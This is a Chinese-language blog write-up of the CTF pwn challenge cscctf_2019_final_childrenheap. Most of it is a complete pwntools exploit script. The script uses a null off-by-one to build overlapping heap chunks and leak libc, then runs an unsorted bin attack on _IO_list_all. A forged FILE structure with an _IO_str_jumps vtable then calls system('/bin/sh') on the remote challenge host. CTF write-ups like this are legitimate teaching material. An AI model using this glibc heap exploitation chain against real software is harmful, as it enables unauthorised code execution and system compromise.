ha1vk's blog
0%

cscctf_2019_final_childrenheap

发表于 分类于

首先,检查一下程序的保护机制

然后用IDA分析一下

Update功能存在一个null off by one

禁用了fastbin,因此不能fastbin attack。那么可以利用house of orange或者large bin attack,个人认为house of orange较为简单一些。

利用null off by one,伪造chunk的prev_size和size,unsorted bin合并形成overlap chunk,从而控制住夹在中间的unsorted bin,然后就是常规的house of orange利用了,由于比较难泄露堆地址,我们就利用house of orange in 2.24的手法,让vtable为_IO_str_jumps_+xxx。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
#coding:utf8
from pwn import *

#sh = process('./cscctf_2019_final_childrenheap')
sh = remote('node3.buuoj.cn',29184)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
malloc_hook_s = libc.symbols['__malloc_hook']
_IO_list_all_s = libc.symbols['_IO_list_all']
system_s = libc.sym['system']
binsh_s = libc.search('/bin/sh').next()

def get_IO_str_jumps():
   IO_file_jumps_offset = libc.sym['_IO_file_jumps']
   IO_str_underflow_offset = libc.sym['_IO_str_underflow']
   for ref_offset in libc.search(p64(IO_str_underflow_offset)):
       possible_IO_str_jumps_offset = ref_offset - 0x20
       if possible_IO_str_jumps_offset > IO_file_jumps_offset:
          print possible_IO_str_jumps_offset
          return possible_IO_str_jumps_offset

def add(index,size,content):
   sh.sendlineafter('>>','1')
   sh.sendlineafter('Index:',str(index))
   sh.sendlineafter('Size:',str(size))
   sh.sendafter('Content:',content)

def edit(index,content):
   sh.sendlineafter('>>','2')
   sh.sendlineafter('Index:',str(index))
   sh.sendafter('Content:',content)

def show(index):
   sh.sendlineafter('>>','3')
   sh.sendlineafter('Index:',str(index))

def delete(index):
   sh.sendlineafter('>>','4')
   sh.sendlineafter('Index:',str(index))

add(0,0xF0,'a') #0
add(1,0xF8,'b') #1
add(2,0xF0,'c') #2
add(3,0x10,'d') #3

delete(0)
#null off by one
edit(1,'d'*0xF0 + p64(0x100 + 0x100))
delete(2)
add(0,0xF0,'a')
show(1)
sh.recvuntil('content: ')
main_arena_88 = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_88 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
system_addr = libc_base + system_s
binsh_addr = libc_base + binsh_s
_IO_list_all_addr = libc_base + _IO_list_all_s
_IO_str_jumps_addr = libc_base + get_IO_str_jumps()
print 'libc_base=',hex(libc_base)
print 'malloc_hook_addr=',hex(malloc_hook_addr)
print 'system_addr=',hex(system_addr)
print '_IO_list_all_addr=',hex(_IO_list_all_addr)

delete(0)
add(0,0x100,'a')
#通过1,可以完全控制unsorted bin,我们可以用house of orange
fake_file = p64(0) + p64(0x60)
fake_file += p64(0) + p64(_IO_list_all_addr - 0x10) #unsorted bin attack在_IO_list_all_addr写入main_arena地址
fake_file += p64(0) + p64(1)
fake_file += p64(0) + p64(binsh_addr)
fake_file = fake_file.ljust(0xD8,'\x00')
#vtable指针
fake_file += p64(_IO_str_jumps_addr - 8)
fake_file += p64(0) + p64(system_addr)
edit(1,fake_file)
#getshell
sh.sendlineafter('>>','1')
sh.sendlineafter('Index:','7')
sh.sendlineafter('Size:',str(0x60))

sh.interactive()